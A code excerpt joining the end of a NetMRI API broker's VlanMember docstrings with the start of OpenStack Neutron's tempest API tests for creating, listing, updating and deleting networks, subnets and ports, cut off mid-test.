:param val_c_VlanName: If op_VlanName is specified, this value will be compared to the value in VlanName using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_VlanName must be specified if op_VlanName is specified.
:type val_c_VlanName: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_VlanState: The operator to apply to the field VlanState. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. VlanState: The state of this VLAN on this device. Empty for non-bridge members.
The state 'mtuTooBigForDevice' indicates that this device cannot participate in this VLAN because the VLAN's MTU is larger than the device can support.
The state 'mtuTooBigForTrunk' indicates that while this VLAN's MTU is supported by this device, it is too large for one or more of the device's trunk ports. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_VlanState: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_VlanState: If op_VlanState is specified, the field named in this input will be compared to the value in VlanState using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_VlanState must be specified if op_VlanState is specified.
:type val_f_VlanState: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_VlanState: If op_VlanState is specified, this value will be compared to the value in VlanState using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_VlanState must be specified if op_VlanState is specified.
:type val_c_VlanState: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_VlanType: The operator to apply to the field VlanType. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. VlanType: The type of this VLAN (1:ethernet, 2:fddi, 3:tokenRing, 4:fddiNet, 5:trNet, 6:deprecated) as configured on this device. Empty for non-bridge members. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_VlanType: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_VlanType: If op_VlanType is specified, the field named in this input will be compared to the value in VlanType using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_VlanType must be specified if op_VlanType is specified.
:type val_f_VlanType: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_VlanType: If op_VlanType is specified, this value will be compared to the value in VlanType using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_VlanType must be specified if op_VlanType is specified.
:type val_c_VlanType: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_network_id: The operator to apply to the field network_id. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. network_id: The Network View ID assigned to the Vlan membership. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_network_id: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_network_id: If op_network_id is specified, the field named in this input will be compared to the value in network_id using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_network_id must be specified if op_network_id is specified.
:type val_f_network_id: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_network_id: If op_network_id is specified, this value will be compared to the value in network_id using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_network_id must be specified if op_network_id is specified.
:type val_c_network_id: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param DeviceGroupID: The internal NetMRI identifier of the device groups to which to limit the results.
:type DeviceGroupID: Array of Integer
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param timestamp: The data returned will represent the vlan members as of this date and time. If omitted, the result will indicate the most recently collected data.
:type timestamp: DateTime
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param methods: A list of vlan member methods. The listed methods will be called on each vlan member returned and included in the output. Available methods are: network_id, data_source, device, interface, vlan.
:type methods: Array of String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param include: A list of associated object types to include in the output. The listed associations will be returned as outputs named according to the association name (see outputs below). Available includes are: data_source, device, interface, vlan.
:type include: Array of String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` 0
:param start: The record number to return in the selected page of data. It will always appear, although it may not be the first record. See the :limit for more information.
:type start: Integer
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` 1000
:param limit: The size of the page of data, that is, the maximum number of records returned. The limit size will be used to break the data up into pages and the first page with the start record will be returned. So if you have 100 records and use a :limit of 10 and a :start of 10, you will get records 10-19. The maximum limit is 10000.
:type limit: Integer
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` VlanMemberID
:param sort: The data field(s) to use for sorting the output. Default is VlanMemberID. Valid values are VlanMemberID, VlanMemberStartTime, VlanMemberEndTime, VlanMemberChangedCols, VlanMemberTimestamp, DataSourceID, DeviceID, VlanID, InterfaceID, BridgeMemberInd, VlanState, VlanType, VlanName, VTPDomain, RootBridgeAddress, BaseBridgeAddress, BaseNumPorts, StpDesignatedRoot, StpProtocolSpecification, StpPriority, StpTopChanges, StpRootCost, StpRootPort, StpMaxAge, StpHelloTime, StpHoldTime, StpForwardDelay, StpBridgeMaxAge, StpBridgeHelloTime, StpBridgeForwardDelay.
:type sort: Array of String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` asc
:param dir: The direction(s) in which to sort the data. Default is 'asc'. Valid values are 'asc' and 'desc'.
:type dir: Array of String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param select: The list of attributes to return for each VlanMember. Valid values are VlanMemberID, VlanMemberStartTime, VlanMemberEndTime, VlanMemberChangedCols, VlanMemberTimestamp, DataSourceID, DeviceID, VlanID, InterfaceID, BridgeMemberInd, VlanState, VlanType, VlanName, VTPDomain, RootBridgeAddress, BaseBridgeAddress, BaseNumPorts, StpDesignatedRoot, StpProtocolSpecification, StpPriority, StpTopChanges, StpRootCost, StpRootPort, StpMaxAge, StpHelloTime, StpHoldTime, StpForwardDelay, StpBridgeMaxAge, StpBridgeHelloTime, StpBridgeForwardDelay. If empty or omitted, all attributes will be returned.
:type select: Array
| ``api version min:`` 2.8
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param goto_field: The field name for NIOS GOTO that is used for locating a row position of records.
:type goto_field: String
| ``api version min:`` 2.8
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param goto_value: The value of goto_field for NIOS GOTO that is used for locating a row position of records.
:type goto_value: String
| ``api version min:`` 2.8
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param NetworkID: The network id to which results would be limited.
:type NetworkID: Integer
| ``api version min:`` 2.3
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param xml_filter: A SetFilter XML structure to further refine the search. The SetFilter will be applied AFTER any search query or field values, but before any limit options. The limit and pagination will be enforced after the filter. Remind that this kind of filter may be costly and inefficient if not associated with a database filtering.
:type xml_filter: String
**Outputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:return vlan_members: An array of the VlanMember objects that match the specified input criteria.
:rtype vlan_members: Array of VlanMember
"""
return self.api_list_request(self._get_method_fullname("find"), kwargs)
def data_source(self, **kwargs):
"""The NetMRI device that collected this record.
**Inputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` True
| ``default:`` None
:param VlanMemberID: The internal NetMRI identifier for this VLAN membership.
:type VlanMemberID: Integer
**Outputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:return : The NetMRI device that collected this record.
:rtype : DataSource
"""
return self.api_request(self._get_method_fullname("data_source"), kwargs)
def interface(self, **kwargs):
"""The switched virtual interface for this VLAN on this device.
**Inputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` True
| ``default:`` None
:param VlanMemberID: The internal NetMRI identifier for this VLAN membership.
:type VlanMemberID: Integer
**Outputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:return : The switched virtual interface for this VLAN on this device.
:rtype : Interface
"""
return self.api_request(self._get_method_fullname("interface"), kwargs)
def vlan(self, **kwargs):
"""The VLAN associated with this VLAN membership.
**Inputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` True
| ``default:`` None
:param VlanMemberID: The internal NetMRI identifier for this VLAN membership.
:type VlanMemberID: Integer
**Outputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:return : The VLAN associated with this VLAN membership.
:rtype : Vlan
"""
return self.api_request(self._get_method_fullname("vlan"), kwargs)
def infradevice(self, **kwargs):
"""The device associated with this VLAN membership.
**Inputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` True
| ``default:`` None
:param VlanMemberID: The internal NetMRI identifier for this VLAN membership.
:type VlanMemberID: Integer
**Outputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:return : The device associated with this VLAN membership.
:rtype : InfraDevice
"""
return self.api_request(self._get_method_fullname("infradevice"), kwargs)
def network_id(self, **kwargs):
"""The Network View ID assigned to the Vlan membership.
**Inputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` True
| ``default:`` None
:param VlanMemberID: The internal NetMRI identifier for this VLAN membership.
:type VlanMemberID: Integer
**Outputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:return : The Network View ID assigned to the Vlan membership.
:rtype : Integer
"""
return self.api_request(self._get_method_fullname("network_id"), kwargs)
def device(self, **kwargs):
"""The device associated with this VLAN membership.
**Inputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` True
| ``default:`` None
:param VlanMemberID: The internal NetMRI identifier for this VLAN membership.
:type VlanMemberID: Integer
**Outputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:return : The device associated with this VLAN membership.
:rtype : Device
"""
return self.api_request(self._get_method_fullname("device"), kwargs)
| apache-2.0 |
dhanunjaya/neutron | neutron/tests/api/test_networks.py | 28 | 29625 | # Copyright 2012 OpenStack Foundation
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import itertools
import netaddr
import six
from tempest_lib.common.utils import data_utils
from tempest_lib import exceptions as lib_exc
from neutron.tests.api import base
from neutron.tests.tempest.common import custom_matchers
from neutron.tests.tempest import config
from neutron.tests.tempest import test
CONF = config.CONF
class NetworksTestJSON(base.BaseNetworkTest):
"""
Tests the following operations in the Neutron API using the REST client for
Neutron:
create a network for a tenant
list tenant's networks
show a tenant network details
create a subnet for a tenant
list tenant's subnets
show a tenant subnet details
network update
subnet update
delete a network also deletes its subnets
list external networks
All subnet tests are run once with ipv4 and once with ipv6.
v2.0 of the Neutron API is assumed. It is also assumed that the following
options are defined in the [network] section of etc/tempest.conf:
tenant_network_cidr with a block of cidr's from which smaller blocks
can be allocated for tenant ipv4 subnets
tenant_network_v6_cidr is the equivalent for ipv6 subnets
tenant_network_mask_bits with the mask bits to be used to partition the
block defined by tenant_network_cidr
tenant_network_v6_mask_bits is the equivalent for ipv6 subnets
"""
@classmethod
def resource_setup(cls):
super(NetworksTestJSON, cls).resource_setup()
cls.network = cls.create_network()
cls.name = cls.network['name']
cls.subnet = cls._create_subnet_with_last_subnet_block(cls.network,
cls._ip_version)
cls.cidr = cls.subnet['cidr']
cls._subnet_data = {6: {'gateway':
str(cls._get_gateway_from_tempest_conf(6)),
'allocation_pools':
cls._get_allocation_pools_from_gateway(6),
'dns_nameservers': ['2001:4860:4860::8844',
'2001:4860:4860::8888'],
'host_routes': [{'destination': '2001::/64',
'nexthop': '2003::1'}],
'new_host_routes': [{'destination':
'2001::/64',
'nexthop': '2005::1'}],
'new_dns_nameservers':
['2001:4860:4860::7744',
'2001:4860:4860::7888']},
4: {'gateway':
str(cls._get_gateway_from_tempest_conf(4)),
'allocation_pools':
cls._get_allocation_pools_from_gateway(4),
'dns_nameservers': ['8.8.4.4', '8.8.8.8'],
'host_routes': [{'destination': '10.20.0.0/32',
'nexthop': '10.100.1.1'}],
'new_host_routes': [{'destination':
'10.20.0.0/32',
'nexthop':
'10.100.1.2'}],
'new_dns_nameservers': ['7.8.8.8', '7.8.4.4']}}
@classmethod
def _create_subnet_with_last_subnet_block(cls, network, ip_version):
"""Derive last subnet CIDR block from tenant CIDR and
create the subnet with that derived CIDR
"""
if ip_version == 4:
cidr = netaddr.IPNetwork(CONF.network.tenant_network_cidr)
mask_bits = CONF.network.tenant_network_mask_bits
elif ip_version == 6:
cidr = netaddr.IPNetwork(CONF.network.tenant_network_v6_cidr)
mask_bits = CONF.network.tenant_network_v6_mask_bits
subnet_cidr = list(cidr.subnet(mask_bits))[-1]
gateway_ip = str(netaddr.IPAddress(subnet_cidr) + 1)
return cls.create_subnet(network, gateway=gateway_ip,
cidr=subnet_cidr, mask_bits=mask_bits)
@classmethod
def _get_gateway_from_tempest_conf(cls, ip_version):
"""Return first subnet gateway for configured CIDR """
if ip_version == 4:
cidr = netaddr.IPNetwork(CONF.network.tenant_network_cidr)
mask_bits = CONF.network.tenant_network_mask_bits
elif ip_version == 6:
cidr = netaddr.IPNetwork(CONF.network.tenant_network_v6_cidr)
mask_bits = CONF.network.tenant_network_v6_mask_bits
if mask_bits >= cidr.prefixlen:
return netaddr.IPAddress(cidr) + 1
else:
for subnet in cidr.subnet(mask_bits):
return netaddr.IPAddress(subnet) + 1
@classmethod
def _get_allocation_pools_from_gateway(cls, ip_version):
"""Return allocation range for subnet of given gateway"""
gateway = cls._get_gateway_from_tempest_conf(ip_version)
return [{'start': str(gateway + 2), 'end': str(gateway + 3)}]
def subnet_dict(self, include_keys):
"""Return a subnet dict which has include_keys and their corresponding
value from self._subnet_data
"""
return dict((key, self._subnet_data[self._ip_version][key])
for key in include_keys)
def _compare_resource_attrs(self, actual, expected):
exclude_keys = set(actual).symmetric_difference(expected)
self.assertThat(actual, custom_matchers.MatchesDictExceptForKeys(
expected, exclude_keys))
def _delete_network(self, network):
# Deleting network also deletes its subnets if exists
self.client.delete_network(network['id'])
if network in self.networks:
self.networks.remove(network)
for subnet in self.subnets:
if subnet['network_id'] == network['id']:
self.subnets.remove(subnet)
def _create_verify_delete_subnet(self, cidr=None, mask_bits=None,
**kwargs):
network = self.create_network()
net_id = network['id']
gateway = kwargs.pop('gateway', None)
subnet = self.create_subnet(network, gateway, cidr, mask_bits,
**kwargs)
compare_args_full = dict(gateway_ip=gateway, cidr=cidr,
mask_bits=mask_bits, **kwargs)
compare_args = dict((k, v) for k, v in six.iteritems(compare_args_full)
if v is not None)
if 'dns_nameservers' in set(subnet).intersection(compare_args):
self.assertEqual(sorted(compare_args['dns_nameservers']),
sorted(subnet['dns_nameservers']))
del subnet['dns_nameservers'], compare_args['dns_nameservers']
self._compare_resource_attrs(subnet, compare_args)
self.client.delete_network(net_id)
self.networks.pop()
self.subnets.pop()
@test.attr(type='smoke')
@test.idempotent_id('0e269138-0da6-4efc-a46d-578161e7b221')
def test_create_update_delete_network_subnet(self):
# Create a network
name = data_utils.rand_name('network-')
network = self.create_network(network_name=name)
self.addCleanup(self._delete_network, network)
net_id = network['id']
self.assertEqual('ACTIVE', network['status'])
# Verify network update
new_name = "New_network"
body = self.client.update_network(net_id, name=new_name)
updated_net = body['network']
self.assertEqual(updated_net['name'], new_name)
# Find a cidr that is not in use yet and create a subnet with it
subnet = self.create_subnet(network)
subnet_id = subnet['id']
# Verify subnet update
new_name = "New_subnet"
body = self.client.update_subnet(subnet_id, name=new_name)
updated_subnet = body['subnet']
self.assertEqual(updated_subnet['name'], new_name)
@test.attr(type='smoke')
@test.idempotent_id('2bf13842-c93f-4a69-83ed-717d2ec3b44e')
def test_show_network(self):
# Verify the details of a network
body = self.client.show_network(self.network['id'])
network = body['network']
for key in ['id', 'name', 'mtu']:
self.assertEqual(network[key], self.network[key])
@test.attr(type='smoke')
@test.idempotent_id('867819bb-c4b6-45f7-acf9-90edcf70aa5e')
def test_show_network_fields(self):
# Verify specific fields of a network
fields = ['id', 'name', 'mtu']
body = self.client.show_network(self.network['id'],
fields=fields)
network = body['network']
self.assertEqual(sorted(network.keys()), sorted(fields))
for field_name in fields:
self.assertEqual(network[field_name], self.network[field_name])
@test.attr(type='smoke')
@test.idempotent_id('f7ffdeda-e200-4a7a-bcbe-05716e86bf43')
def test_list_networks(self):
# Verify the network exists in the list of all networks
body = self.client.list_networks()
networks = [network['id'] for network in body['networks']
if network['id'] == self.network['id']]
self.assertNotEmpty(networks, "Created network not found in the list")
@test.attr(type='smoke')
@test.idempotent_id('6ae6d24f-9194-4869-9c85-c313cb20e080')
def test_list_networks_fields(self):
# Verify specific fields of the networks
fields = ['id', 'name', 'mtu']
body = self.client.list_networks(fields=fields)
networks = body['networks']
self.assertNotEmpty(networks, "Network list returned is empty")
for network in networks:
self.assertEqual(sorted(network.keys()), sorted(fields))
@test.attr(type='smoke')
@test.idempotent_id('bd635d81-6030-4dd1-b3b9-31ba0cfdf6cc')
def test_show_subnet(self):
# Verify the details of a subnet
body = self.client.show_subnet(self.subnet['id'])
subnet = body['subnet']
self.assertNotEmpty(subnet, "Subnet returned has no fields")
for key in ['id', 'cidr']:
self.assertIn(key, subnet)
self.assertEqual(subnet[key], self.subnet[key])
@test.attr(type='smoke')
@test.idempotent_id('270fff0b-8bfc-411f-a184-1e8fd35286f0')
def test_show_subnet_fields(self):
# Verify specific fields of a subnet
fields = ['id', 'network_id']
body = self.client.show_subnet(self.subnet['id'],
fields=fields)
subnet = body['subnet']
self.assertEqual(sorted(subnet.keys()), sorted(fields))
for field_name in fields:
self.assertEqual(subnet[field_name], self.subnet[field_name])
@test.attr(type='smoke')
@test.idempotent_id('db68ba48-f4ea-49e9-81d1-e367f6d0b20a')
def test_list_subnets(self):
# Verify the subnet exists in the list of all subnets
body = self.client.list_subnets()
subnets = [subnet['id'] for subnet in body['subnets']
if subnet['id'] == self.subnet['id']]
self.assertNotEmpty(subnets, "Created subnet not found in the list")
@test.attr(type='smoke')
@test.idempotent_id('842589e3-9663-46b0-85e4-7f01273b0412')
def test_list_subnets_fields(self):
# Verify specific fields of subnets
fields = ['id', 'network_id']
body = self.client.list_subnets(fields=fields)
subnets = body['subnets']
self.assertNotEmpty(subnets, "Subnet list returned is empty")
for subnet in subnets:
self.assertEqual(sorted(subnet.keys()), sorted(fields))
def _try_delete_network(self, net_id):
# delete network, if it exists
try:
self.client.delete_network(net_id)
# if network is not found, this means it was deleted in the test
except lib_exc.NotFound:
pass
@test.attr(type='smoke')
@test.idempotent_id('f04f61a9-b7f3-4194-90b2-9bcf660d1bfe')
def test_delete_network_with_subnet(self):
# Creates a network
name = data_utils.rand_name('network-')
body = self.client.create_network(name=name)
network = body['network']
net_id = network['id']
self.addCleanup(self._try_delete_network, net_id)
# Find a cidr that is not in use yet and create a subnet with it
subnet = self.create_subnet(network)
subnet_id = subnet['id']
# Delete network while the subnet still exists
body = self.client.delete_network(net_id)
# Verify that the subnet got automatically deleted.
self.assertRaises(lib_exc.NotFound, self.client.show_subnet,
subnet_id)
# Since create_subnet adds the subnet to the delete list, and it is
# is actually deleted here - this will create and issue, hence remove
# it from the list.
self.subnets.pop()
@test.attr(type='smoke')
@test.idempotent_id('d2d596e2-8e76-47a9-ac51-d4648009f4d3')
def test_create_delete_subnet_without_gateway(self):
self._create_verify_delete_subnet()
@test.attr(type='smoke')
@test.idempotent_id('9393b468-186d-496d-aa36-732348cd76e7')
def test_create_delete_subnet_with_gw(self):
self._create_verify_delete_subnet(
**self.subnet_dict(['gateway']))
@test.attr(type='smoke')
@test.idempotent_id('bec949c4-3147-4ba6-af5f-cd2306118404')
def test_create_delete_subnet_with_allocation_pools(self):
self._create_verify_delete_subnet(
**self.subnet_dict(['allocation_pools']))
@test.attr(type='smoke')
@test.idempotent_id('8217a149-0c6c-4cfb-93db-0486f707d13f')
def test_create_delete_subnet_with_gw_and_allocation_pools(self):
self._create_verify_delete_subnet(**self.subnet_dict(
['gateway', 'allocation_pools']))
@test.attr(type='smoke')
@test.idempotent_id('d830de0a-be47-468f-8f02-1fd996118289')
def test_create_delete_subnet_with_host_routes_and_dns_nameservers(self):
self._create_verify_delete_subnet(
**self.subnet_dict(['host_routes', 'dns_nameservers']))
@test.attr(type='smoke')
@test.idempotent_id('94ce038d-ff0a-4a4c-a56b-09da3ca0b55d')
def test_create_delete_subnet_with_dhcp_enabled(self):
self._create_verify_delete_subnet(enable_dhcp=True)
@test.attr(type='smoke')
@test.idempotent_id('3d3852eb-3009-49ec-97ac-5ce83b73010a')
def test_update_subnet_gw_dns_host_routes_dhcp(self):
network = self.create_network()
self.addCleanup(self._delete_network, network)
subnet = self.create_subnet(
network, **self.subnet_dict(['gateway', 'host_routes',
'dns_nameservers',
'allocation_pools']))
subnet_id = subnet['id']
new_gateway = str(netaddr.IPAddress(
self._subnet_data[self._ip_version]['gateway']) + 1)
# Verify subnet update
new_host_routes = self._subnet_data[self._ip_version][
'new_host_routes']
new_dns_nameservers = self._subnet_data[self._ip_version][
'new_dns_nameservers']
kwargs = {'host_routes': new_host_routes,
'dns_nameservers': new_dns_nameservers,
'gateway_ip': new_gateway, 'enable_dhcp': True}
new_name = "New_subnet"
body = self.client.update_subnet(subnet_id, name=new_name,
**kwargs)
updated_subnet = body['subnet']
kwargs['name'] = new_name
self.assertEqual(sorted(updated_subnet['dns_nameservers']),
sorted(kwargs['dns_nameservers']))
del subnet['dns_nameservers'], kwargs['dns_nameservers']
self._compare_resource_attrs(updated_subnet, kwargs)
@test.attr(type='smoke')
@test.idempotent_id('a4d9ec4c-0306-4111-a75c-db01a709030b')
def test_create_delete_subnet_all_attributes(self):
self._create_verify_delete_subnet(
enable_dhcp=True,
**self.subnet_dict(['gateway', 'host_routes', 'dns_nameservers']))
@test.attr(type='smoke')
@test.idempotent_id('af774677-42a9-4e4b-bb58-16fe6a5bc1ec')
def test_external_network_visibility(self):
"""Verifies user can see external networks but not subnets."""
body = self.client.list_networks(**{'router:external': True})
networks = [network['id'] for network in body['networks']]
self.assertNotEmpty(networks, "No external networks found")
nonexternal = [net for net in body['networks'] if
not net['router:external']]
self.assertEmpty(nonexternal, "Found non-external networks"
" in filtered list (%s)." % nonexternal)
self.assertIn(CONF.network.public_network_id, networks)
subnets_iter = (network['subnets'] for network in body['networks'])
# subnets_iter is a list (iterator) of lists. This flattens it to a
# list of UUIDs
public_subnets_iter = itertools.chain(*subnets_iter)
body = self.client.list_subnets()
subnets = [sub['id'] for sub in body['subnets']
if sub['id'] in public_subnets_iter]
self.assertEmpty(subnets, "Public subnets visible")
class BulkNetworkOpsTestJSON(base.BaseNetworkTest):
"""
Tests the following operations in the Neutron API using the REST client for
Neutron:
bulk network creation
bulk subnet creation
bulk port creation
list tenant's networks
v2.0 of the Neutron API is assumed. It is also assumed that the following
options are defined in the [network] section of etc/tempest.conf:
tenant_network_cidr with a block of cidr's from which smaller blocks
can be allocated for tenant networks
tenant_network_mask_bits with the mask bits to be used to partition the
block defined by tenant-network_cidr
"""
def _delete_networks(self, created_networks):
for n in created_networks:
self.client.delete_network(n['id'])
# Asserting that the networks are not found in the list after deletion
body = self.client.list_networks()
networks_list = [network['id'] for network in body['networks']]
for n in created_networks:
self.assertNotIn(n['id'], networks_list)
def _delete_subnets(self, created_subnets):
for n in created_subnets:
self.client.delete_subnet(n['id'])
# Asserting that the subnets are not found in the list after deletion
body = self.client.list_subnets()
subnets_list = [subnet['id'] for subnet in body['subnets']]
for n in created_subnets:
self.assertNotIn(n['id'], subnets_list)
def _delete_ports(self, created_ports):
for n in created_ports:
self.client.delete_port(n['id'])
# Asserting that the ports are not found in the list after deletion
body = self.client.list_ports()
ports_list = [port['id'] for port in body['ports']]
for n in created_ports:
self.assertNotIn(n['id'], ports_list)
@test.attr(type='smoke')
@test.idempotent_id('d4f9024d-1e28-4fc1-a6b1-25dbc6fa11e2')
def test_bulk_create_delete_network(self):
# Creates 2 networks in one request
network_names = [data_utils.rand_name('network-'),
data_utils.rand_name('network-')]
body = self.client.create_bulk_network(network_names)
created_networks = body['networks']
self.addCleanup(self._delete_networks, created_networks)
# Asserting that the networks are found in the list after creation
body = self.client.list_networks()
networks_list = [network['id'] for network in body['networks']]
for n in created_networks:
self.assertIsNotNone(n['id'])
self.assertIn(n['id'], networks_list)
@test.attr(type='smoke')
@test.idempotent_id('8936533b-c0aa-4f29-8e53-6cc873aec489')
def test_bulk_create_delete_subnet(self):
networks = [self.create_network(), self.create_network()]
# Creates 2 subnets in one request
if self._ip_version == 4:
cidr = netaddr.IPNetwork(CONF.network.tenant_network_cidr)
mask_bits = CONF.network.tenant_network_mask_bits
else:
cidr = netaddr.IPNetwork(CONF.network.tenant_network_v6_cidr)
mask_bits = CONF.network.tenant_network_v6_mask_bits
cidrs = [subnet_cidr for subnet_cidr in cidr.subnet(mask_bits)]
names = [data_utils.rand_name('subnet-') for i in range(len(networks))]
subnets_list = []
for i in range(len(names)):
p1 = {
'network_id': networks[i]['id'],
'cidr': str(cidrs[(i)]),
'name': names[i],
'ip_version': self._ip_version
}
subnets_list.append(p1)
del subnets_list[1]['name']
body = self.client.create_bulk_subnet(subnets_list)
created_subnets = body['subnets']
self.addCleanup(self._delete_subnets, created_subnets)
# Asserting that the subnets are found in the list after creation
body = self.client.list_subnets()
subnets_list = [subnet['id'] for subnet in body['subnets']]
for n in created_subnets:
self.assertIsNotNone(n['id'])
self.assertIn(n['id'], subnets_list)
@test.attr(type='smoke')
@test.idempotent_id('48037ff2-e889-4c3b-b86a-8e3f34d2d060')
def test_bulk_create_delete_port(self):
networks = [self.create_network(), self.create_network()]
# Creates 2 ports in one request
names = [data_utils.rand_name('port-') for i in range(len(networks))]
port_list = []
state = [True, False]
for i in range(len(names)):
p1 = {
'network_id': networks[i]['id'],
'name': names[i],
'admin_state_up': state[i],
}
port_list.append(p1)
del port_list[1]['name']
body = self.client.create_bulk_port(port_list)
created_ports = body['ports']
self.addCleanup(self._delete_ports, created_ports)
# Asserting that the ports are found in the list after creation
body = self.client.list_ports()
ports_list = [port['id'] for port in body['ports']]
for n in created_ports:
self.assertIsNotNone(n['id'])
self.assertIn(n['id'], ports_list)
class BulkNetworkOpsIpV6TestJSON(BulkNetworkOpsTestJSON):
_ip_version = 6
class NetworksIpV6TestJSON(NetworksTestJSON):
_ip_version = 6
@test.attr(type='smoke')
@test.idempotent_id('e41a4888-65a6-418c-a095-f7c2ef4ad59a')
def test_create_delete_subnet_with_gw(self):
net = netaddr.IPNetwork(CONF.network.tenant_network_v6_cidr)
gateway = str(netaddr.IPAddress(net.first + 2))
name = data_utils.rand_name('network-')
network = self.create_network(network_name=name)
subnet = self.create_subnet(network, gateway)
# Verifies Subnet GW in IPv6
self.assertEqual(subnet['gateway_ip'], gateway)
@test.attr(type='smoke')
@test.idempotent_id('ebb4fd95-524f-46af-83c1-0305b239338f')
def test_create_delete_subnet_with_default_gw(self):
net = netaddr.IPNetwork(CONF.network.tenant_network_v6_cidr)
gateway_ip = str(netaddr.IPAddress(net.first + 1))
name = data_utils.rand_name('network-')
network = self.create_network(network_name=name)
subnet = self.create_subnet(network)
# Verifies Subnet GW in IPv6
self.assertEqual(subnet['gateway_ip'], gateway_ip)
@test.attr(type='smoke')
@test.idempotent_id('a9653883-b2a4-469b-8c3c-4518430a7e55')
def test_create_list_subnet_with_no_gw64_one_network(self):
name = data_utils.rand_name('network-')
network = self.create_network(name)
ipv6_gateway = self.subnet_dict(['gateway'])['gateway']
subnet1 = self.create_subnet(network,
ip_version=6,
gateway=ipv6_gateway)
self.assertEqual(netaddr.IPNetwork(subnet1['cidr']).version, 6,
'The created subnet is not IPv6')
subnet2 = self.create_subnet(network,
gateway=None,
ip_version=4)
self.assertEqual(netaddr.IPNetwork(subnet2['cidr']).version, 4,
'The created subnet is not IPv4')
# Verifies Subnet GW is set in IPv6
self.assertEqual(subnet1['gateway_ip'], ipv6_gateway)
# Verifies Subnet GW is None in IPv4
self.assertEqual(subnet2['gateway_ip'], None)
# Verifies all 2 subnets in the same network
body = self.client.list_subnets()
subnets = [sub['id'] for sub in body['subnets']
if sub['network_id'] == network['id']]
test_subnet_ids = [sub['id'] for sub in (subnet1, subnet2)]
self.assertItemsEqual(subnets,
test_subnet_ids,
'Subnet are not in the same network')
class NetworksIpV6TestAttrs(NetworksIpV6TestJSON):
@classmethod
def resource_setup(cls):
if not CONF.network_feature_enabled.ipv6_subnet_attributes:
raise cls.skipException("IPv6 extended attributes for "
"subnets not available")
super(NetworksIpV6TestAttrs, cls).resource_setup()
@test.attr(type='smoke')
@test.idempotent_id('da40cd1b-a833-4354-9a85-cd9b8a3b74ca')
def test_create_delete_subnet_with_v6_attributes_stateful(self):
self._create_verify_delete_subnet(
gateway=self._subnet_data[self._ip_version]['gateway'],
ipv6_ra_mode='dhcpv6-stateful',
ipv6_address_mode='dhcpv6-stateful')
@test.attr(type='smoke')
@test.idempotent_id('176b030f-a923-4040-a755-9dc94329e60c')
def test_create_delete_subnet_with_v6_attributes_slaac(self):
self._create_verify_delete_subnet(
ipv6_ra_mode='slaac',
ipv6_address_mode='slaac')
@test.attr(type='smoke')
@test.idempotent_id('7d410310-8c86-4902-adf9-865d08e31adb')
def test_create_delete_subnet_with_v6_attributes_stateless(self):
self._create_verify_delete_subnet(
